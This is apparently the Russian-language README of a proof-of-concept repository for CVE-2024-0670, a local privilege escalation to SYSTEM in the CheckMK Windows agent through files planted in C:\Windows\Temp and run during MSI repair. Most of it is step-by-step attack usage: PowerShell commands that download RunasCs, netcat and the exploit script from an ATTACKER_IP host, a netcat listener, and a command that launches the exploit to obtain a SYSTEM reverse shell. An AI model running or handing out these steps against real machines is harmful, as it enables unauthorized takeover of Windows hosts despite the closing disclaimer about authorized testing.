
Этот репозиторий содержит демонстрацию эксплуатации уязвимости CVE-2024-0670 — локального повышения привилегий в CheckMK Agent для Windows. Уязвимость позволяет пользователю с низкими привилегиями получить привилегии SYSTEM путем злоупотребления записываемыми путями к файлам, обрабатываемыми механизмом восстановления MSI.
Этот репозиторий содержит простую и чистую proof-of-concept для CVE-2024-0670 — уязвимости локального повышения привилегий в агенте CheckMK для Windows. Пользователь с низкими привилегиями может получить права SYSTEM, злоупотребив записываемыми временными файлами, которые выполняются во время восстановления MSI.
Во время восстановления MSI CheckMK выполняет файлы из:
C:\Windows\Temp\
Если обычный пользователь может поместить туда файлы с предсказуемыми именами, он может выполнять команды от имени NT AUTHORITY\SYSTEM.
Этот эксплойт подставляет несколько имен файлов с полезной нагрузкой и запускает восстановление MSI для получения выполнения от имени SYSTEM.
RunasCs.exe → замена runas (поддержка пароля в открытом виде)
nc.exe → Netcat (обратная оболочка)
exploit.ps1 → скрипт эксплойта CVE-2024-0670
README.md → документация
C:\Windows\Temp\
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/RunasCs.exe" -OutFile "C:\Windows\Temp\RunasCs.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/nc.exe" -OutFile "C:\Windows\Temp\nc.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/exploit.ps1" -OutFile "C:\Windows\Temp\exploit.ps1
Запустите слушатель на своей машине:
nc -lvnp 1111
.\RunasCs.exe username "password" "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Windows\Temp\exploit.ps1"
В случае успеха вы получите обратную оболочку с правами SYSTEM.
net4:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -target:exe -optimize -out:RunasCs.exe RunasCs.cs
net2:
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe -target:exe -optimize -out:RunasCs_net2.exe RunasCs.cs
Этот проект предназначен только для образовательных целей и санкционированного тестирования на проникновение. Не используйте его в незаконных целях. Автор не несёт ответственности за неправильное использование.